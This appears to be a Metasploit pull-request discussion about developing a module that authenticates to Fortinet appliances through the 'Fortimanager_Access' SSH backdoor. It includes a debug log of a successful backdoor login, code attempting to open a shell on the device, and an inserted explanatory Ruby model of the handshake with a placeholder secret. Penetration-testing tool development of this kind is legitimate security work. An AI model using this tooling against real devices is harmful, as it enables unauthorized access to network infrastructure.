Add Fortinet backdoor #6612

Merged: 1 commit merged into rapid7:master on Feb 29, 2016

Conversation

@wvu (Contributor, author) commented Feb 26, 2016

WIP. Finishing up module.

Test with Net::SSH.start(host, 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug); nil in irb.

Resolves #6463.

@wchen-r7 (Contributor) commented:

@wvu-r7 Very smart patching from net/ssh. IMO, if the custom_handler method is specific to the Fortinet backdoor, then you might want to consider placing that patch in the module, or in a mixin. lib/net/ssh/authentication/methods feels rather generic?

@nixawk (Contributor) commented Feb 26, 2016

good +1

[1] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> host = '192.168.1.100'
=> "192.168.1.100"
[2] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> Net::SSH.start(host, 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug)
D, [2016-02-26T23:08:21.847504 #368] DEBUG -- net.ssh.transport.session[3fee2e2dbe08]: establishing connection to 192.168.1.100:22
D, [2016-02-26T23:08:21.849272 #368] DEBUG -- net.ssh.transport.session[3fee2e2dbe08]: connection established
I, [2016-02-26T23:08:21.849401 #368]  INFO -- net.ssh.transport.server_version[3fee2e2d3460]: negotiating protocol version
D, [2016-02-26T23:08:21.850177 #368] DEBUG -- net.ssh.transport.server_version[3fee2e2d3460]: remote is `SSH-2.0-8QX-z'
D, [2016-02-26T23:08:21.850231 #368] DEBUG -- net.ssh.transport.server_version[3fee2e2d3460]: local is `SSH-2.0-OpenSSH_5.0'
D, [2016-02-26T23:08:21.850697 #368] DEBUG -- socket[3fee2e2da440]: read 608 bytes
D, [2016-02-26T23:08:21.850819 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 0 type 20 len 604
I, [2016-02-26T23:08:21.850896 #368]  INFO -- net.ssh.transport.algorithms[3fee2e2b76c0]: got KEXINIT from server
I, [2016-02-26T23:08:21.851097 #368]  INFO -- net.ssh.transport.algorithms[3fee2e2b76c0]: sending KEXINIT
D, [2016-02-26T23:08:21.851259 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 0 type 20 len 716
D, [2016-02-26T23:08:21.851400 #368] DEBUG -- socket[3fee2e2da440]: sent 720 bytes
I, [2016-02-26T23:08:21.851435 #368]  INFO -- net.ssh.transport.algorithms[3fee2e2b76c0]: negotiating algorithms
D, [2016-02-26T23:08:21.851551 #368] DEBUG -- net.ssh.transport.algorithms[3fee2e2b76c0]: negotiated:
* kex: diffie-hellman-group-exchange-sha1
* host_key: ssh-rsa
* encryption_server: aes128-cbc
* encryption_client: aes128-cbc
* hmac_client: hmac-sha1
* hmac_server: hmac-sha1
* compression_client: none
* compression_server: none
* language_client: 
* language_server: 
D, [2016-02-26T23:08:21.851576 #368] DEBUG -- net.ssh.transport.algorithms[3fee2e2b76c0]: exchanging keys
D, [2016-02-26T23:08:21.851760 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 1 type 34 len 20
D, [2016-02-26T23:08:21.851796 #368] DEBUG -- socket[3fee2e2da440]: sent 24 bytes
D, [2016-02-26T23:08:21.896787 #368] DEBUG -- socket[3fee2e2da440]: read 152 bytes
D, [2016-02-26T23:08:21.896944 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 1 type 31 len 148
D, [2016-02-26T23:08:21.902222 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 2 type 32 len 140
D, [2016-02-26T23:08:21.902297 #368] DEBUG -- socket[3fee2e2da440]: sent 144 bytes
D, [2016-02-26T23:08:21.903646 #368] DEBUG -- socket[3fee2e2da440]: read 336 bytes
D, [2016-02-26T23:08:21.903744 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 2 type 33 len 316
D, [2016-02-26T23:08:21.905118 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 3 type 21 len 20
D, [2016-02-26T23:08:21.905296 #368] DEBUG -- socket[3fee2e2da440]: sent 24 bytes
D, [2016-02-26T23:08:21.905367 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 3 type 21 len 12
D, [2016-02-26T23:08:21.905767 #368] DEBUG -- net.ssh.authentication.session[3fee2fe93380]: beginning authentication of `Fortimanager_Access'
D, [2016-02-26T23:08:21.906440 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 4 type 5 len 28
D, [2016-02-26T23:08:21.906504 #368] DEBUG -- socket[3fee2e2da440]: sent 52 bytes
D, [2016-02-26T23:08:21.947348 #368] DEBUG -- socket[3fee2e2da440]: read 52 bytes
D, [2016-02-26T23:08:21.947489 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 4 type 6 len 28
D, [2016-02-26T23:08:21.947611 #368] DEBUG -- net.ssh.authentication.session[3fee2fe93380]: trying fortinet-backdoor
D, [2016-02-26T23:08:21.947695 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Sending SSH_MSG_USERAUTH_REQUEST
D, [2016-02-26T23:08:21.947784 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 5 type 50 len 92
D, [2016-02-26T23:08:21.947879 #368] DEBUG -- socket[3fee2e2da440]: sent 116 bytes
D, [2016-02-26T23:08:21.948200 #368] DEBUG -- socket[3fee2e2da440]: read 68 bytes
D, [2016-02-26T23:08:21.948262 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 5 type 60 len 44
D, [2016-02-26T23:08:21.948305 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Received SSH_MSG_USERAUTH_INFO_REQUEST
D, [2016-02-26T23:08:21.948329 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Sending SSH_MSG_USERAUTH_INFO_RESPONSE
D, [2016-02-26T23:08:21.948421 #368] DEBUG -- socket[3fee2e2da440]: queueing packet nr 6 type 61 len 76
D, [2016-02-26T23:08:21.948533 #368] DEBUG -- socket[3fee2e2da440]: sent 100 bytes
D, [2016-02-26T23:08:21.948705 #368] DEBUG -- socket[3fee2e2da440]: read 36 bytes
D, [2016-02-26T23:08:21.948758 #368] DEBUG -- socket[3fee2e2da440]: received packet nr 6 type 52 len 12
D, [2016-02-26T23:08:21.948808 #368] DEBUG -- net.ssh.authentication.methods.fortinet_backdoor[3fee2fe879b8]: Received SSH_MSG_USERAUTH_SUCCESS

@wvu-r7 How do you gain a new shell for the FortiGate SSH backdoor?

ssh_socket = Net::SSH.start('192.168.1.100', 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug)
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
s = start_session(self, nil, {}, false, conn.lsock)
[2] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket = Net::SSH.start('192.168.1.100', 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug)
[3] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket.exec!("show system interface")
=> "Unknown admin user ''\n"
[4] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket.exec!("?")
=> "Unknown admin user ''\n"
[5] pry(#<Msf::Ui::Console::CommandDispatcher::Core>)> ssh_socket.exec!("help")
=> "Unknown admin user ''\n"

@wvu (Contributor, author) commented Feb 26, 2016

@all3g: Still working that part out. I don't think you can use CommandStream, since that sends an exec channel request (typically with /bin/sh), and we want shell.
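The two things the thread is circling, the keyboard-interactive round trip visible in the debug log (types 50, 60, 61, 52) and the difference between the "exec" channel request that CommandStream sends and the "shell" request an interactive login needs, can be shown on the wire without net/ssh. The following is an added example, not code from this PR, from Metasploit or from net-ssh. SshWire, FakeFortiServer, run_backdoor_auth and PLACEHOLDER_KEY are names introduced here; the challenge text is constructed. The actual Fortinet challenge/response derivation is not on this page, so the HMAC in FakeFortiServer.expected_response is a stand-in assumption that only exists so the exchange completes; it is not the backdoor's algorithm.

```ruby
require 'openssl'

# Minimal SSH wire encoding (RFC 4251 section 5) and the message numbers
# seen in the debug log above (RFC 4252, 4254, 4256). Added example code.
module SshWire
  USERAUTH_REQUEST       = 50
  USERAUTH_FAILURE       = 51
  USERAUTH_SUCCESS       = 52
  USERAUTH_INFO_REQUEST  = 60
  USERAUTH_INFO_RESPONSE = 61
  CHANNEL_REQUEST        = 98

  module_function

  def byte(n);   [n].pack('C'); end
  def bool(b);   [b ? 1 : 0].pack('C'); end
  def uint32(n); [n].pack('N'); end
  def string(s); uint32(s.bytesize) + s.b; end

  # SSH_MSG_USERAUTH_REQUEST asking for keyboard-interactive (RFC 4256 3.1):
  # the "type 50" packet a custom auth method emits first.
  def userauth_request(user, service = 'ssh-connection')
    byte(USERAUTH_REQUEST) + string(user) + string(service) +
      string('keyboard-interactive') + string('') + string('')
  end

  # SSH_MSG_USERAUTH_INFO_REQUEST (type 60): name, instruction, language
  # tag, then num-prompts pairs of (prompt, echo).
  def parse_info_request(pkt)
    r = Reader.new(pkt)
    raise 'not USERAUTH_INFO_REQUEST' unless r.byte == USERAUTH_INFO_REQUEST
    name, instruction, _lang = r.string, r.string, r.string
    prompts = Array.new(r.uint32) { [r.string, r.bool] }
    { name: name, instruction: instruction, prompts: prompts }
  end

  # SSH_MSG_USERAUTH_INFO_RESPONSE (type 61): one answer per prompt.
  def info_response(answers)
    byte(USERAUTH_INFO_RESPONSE) + uint32(answers.size) +
      answers.map { |a| string(a) }.join
  end

  # SSH_MSG_CHANNEL_REQUEST (RFC 4254 6.5). "exec" carries a command string
  # (what CommandStream sends, typically /bin/sh); "shell" carries none.
  def channel_request(recipient, type, command = nil)
    pkt = byte(CHANNEL_REQUEST) + uint32(recipient) + string(type) + bool(true)
    pkt += string(command) if type == 'exec'
    pkt
  end

  # Sequential reader for the same primitives.
  class Reader
    def initialize(buf); @buf = buf.b; @pos = 0; end
    def byte;   v = @buf.getbyte(@pos); @pos += 1; v; end
    def bool;   byte != 0; end
    def uint32; v = @buf[@pos, 4].unpack1('N'); @pos += 4; v; end
    def string; n = uint32; s = @buf[@pos, n]; @pos += n; s; end
  end
end

# Constructed stand-in for the device side. ASSUMPTION: the real
# challenge/response derivation is not on this page; PLACEHOLDER_KEY and
# the HMAC below exist only so the round trip can complete.
class FakeFortiServer
  include SshWire
  BACKDOOR_USER   = 'Fortimanager_Access'
  PLACEHOLDER_KEY = 'placeholder-not-the-real-secret'

  def initialize(challenge); @challenge = challenge; end

  def self.expected_response(challenge)
    OpenSSL::HMAC.hexdigest('SHA256', PLACEHOLDER_KEY, challenge)
  end

  def handle(pkt)
    r = Reader.new(pkt)
    failure = byte(USERAUTH_FAILURE) + string('keyboard-interactive') + bool(false)
    case r.byte
    when USERAUTH_REQUEST
      user, _service, method = r.string, r.string, r.string
      return failure unless user == BACKDOOR_USER && method == 'keyboard-interactive'
      # One non-echoed prompt carrying the challenge (the type 60 packet).
      byte(USERAUTH_INFO_REQUEST) + string('') + string('') + string('') +
        uint32(1) + string(@challenge) + bool(false)
    when USERAUTH_INFO_RESPONSE
      answers = Array.new(r.uint32) { r.string }
      ok = answers.size == 1 && answers[0] == self.class.expected_response(@challenge)
      ok ? byte(USERAUTH_SUCCESS) : failure
    else
      raise 'unexpected message'
    end
  end
end

# Client side of the exchange against the fake server. Returns the final
# message type: 52 (SUCCESS) or 51 (FAILURE).
def run_backdoor_auth(user, challenge: 'constructed-challenge-0001',
                      responder: FakeFortiServer.method(:expected_response))
  server = FakeFortiServer.new(challenge)
  reply  = server.handle(SshWire.userauth_request(user))
  return reply.getbyte(0) unless reply.getbyte(0) == SshWire::USERAUTH_INFO_REQUEST
  prompts = SshWire.parse_info_request(reply)[:prompts]
  answers = prompts.map { |prompt, _echo| responder.call(prompt) }
  server.handle(SshWire.info_response(answers)).getbyte(0)
end
```

The message sequence in run_backdoor_auth is exactly the one the debug log shows (USERAUTH_REQUEST, USERAUTH_INFO_REQUEST, USERAUTH_INFO_RESPONSE, USERAUTH_SUCCESS); swapping the responder for a real one is the only part a working module adds. channel_request makes the exec-vs-shell distinction concrete: the exec packet carries the command string, the shell packet stops after the want-reply flag, which is why a session wrapper built on exec requests behaves differently from an interactive login.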

@sempervictus (Contributor) commented:

@wvu-r7: Neat implementation, though I agree we should try to stay as far away from alterations to net/ssh itself as we can. Ideally some day we will not need our own version because we will have proper integration. Any chance we can do something clever like extend the SSH object after creation instead of altering its library?
You can look at metassh for examples of sessions similar to meterp on SSH, though I wouldn't suggest implementing yet unless you have a clear picture of how; metassh is a bit hacky, though it has some clever ideas for dealing with these channelized transports. You might also be running into the receiving end expecting slightly different behavior on session init than the default client provides...

@wvu (Contributor, author) commented Feb 27, 2016

Sigh #6463 (comment)

Like I said, WIP. I'm already looking into overriding the KeyboardInteractive class, but I kinda need a module first. This was a first step.

Originally, I was modifying the class directly, but I figured adding my own auth method would be less intrusive. Next step is to put it all in the module.

P.S. Does anybody read the original ticket? :)

@wvu added the "blocked" label (Blocked by one or more additional tasks) on Feb 27, 2016
@wvu (Contributor, author) commented Feb 28, 2016

Dumped it all in my module. Working as expected. Will toy with a mixin. Expect an update on Monday. Thanks!

@wvu force-pushed the feature/fortigate branch 2 times, most recently from 281714d to a085ac1, on February 29, 2016 16:41
@wvu (Contributor, author) commented Feb 29, 2016

Moving this to LoginScanner is also on the list of things to do.

@wvu force-pushed the feature/fortigate branch 2 times, most recently from 51af295 to df6fe0a, on February 29, 2016 16:57
@wchen-r7 self-assigned this on Feb 29, 2016
@wvu force-pushed the feature/fortigate branch 2 times, most recently from 8584fdc to b9e9ad4, on February 29, 2016 17:55
@wvu (Contributor, author) commented Feb 29, 2016

Turns out overriding KeyboardInteractive is a recipe for disaster. :)

@wvu force-pushed the feature/fortigate branch 2 times, most recently from 53d7033 to 876ac75, on February 29, 2016 17:59
wchen-r7 added a commit that referenced this pull request Feb 29, 2016
@wvu force-pushed the feature/fortigate branch 2 times, most recently from bd6958b to bb1a1df, on February 29, 2016 18:05
wvu added a commit to wvu/metasploit-framework that referenced this pull request Feb 29, 2016
@wvu merged commit 300fdc8 into rapid7:master on Feb 29, 2016
wvu added a commit that referenced this pull request Feb 29, 2016
@wvu (Contributor, author) commented Feb 29, 2016

Thanks for the merge, @wchen-r7. We'll work on getting a session in another PR.

@wvu deleted the feature/fortigate branch on March 1, 2016
@nixawk (Contributor) commented Mar 3, 2016

@wvu-r7 Good man!

wvu added a commit to wvu/metasploit-framework that referenced this pull request Mar 14, 2016
wvu added a commit that referenced this pull request May 17, 2016
wvu added a commit to wvu/metasploit-framework that referenced this pull request Feb 21, 2018, with the commit message:

Still get "Unknown admin user ''" from a shell channel request,
@busterb's more complete implementation notwithstanding.

Hoping we fix this in a subsequent commit or related PR.

Please see rapid7#6612 and rapid7#9524.
@wvu mentioned this pull request Sep 6, 2018
Labels: blocked (Blocked by one or more additional tasks), feature, library, module

5 participants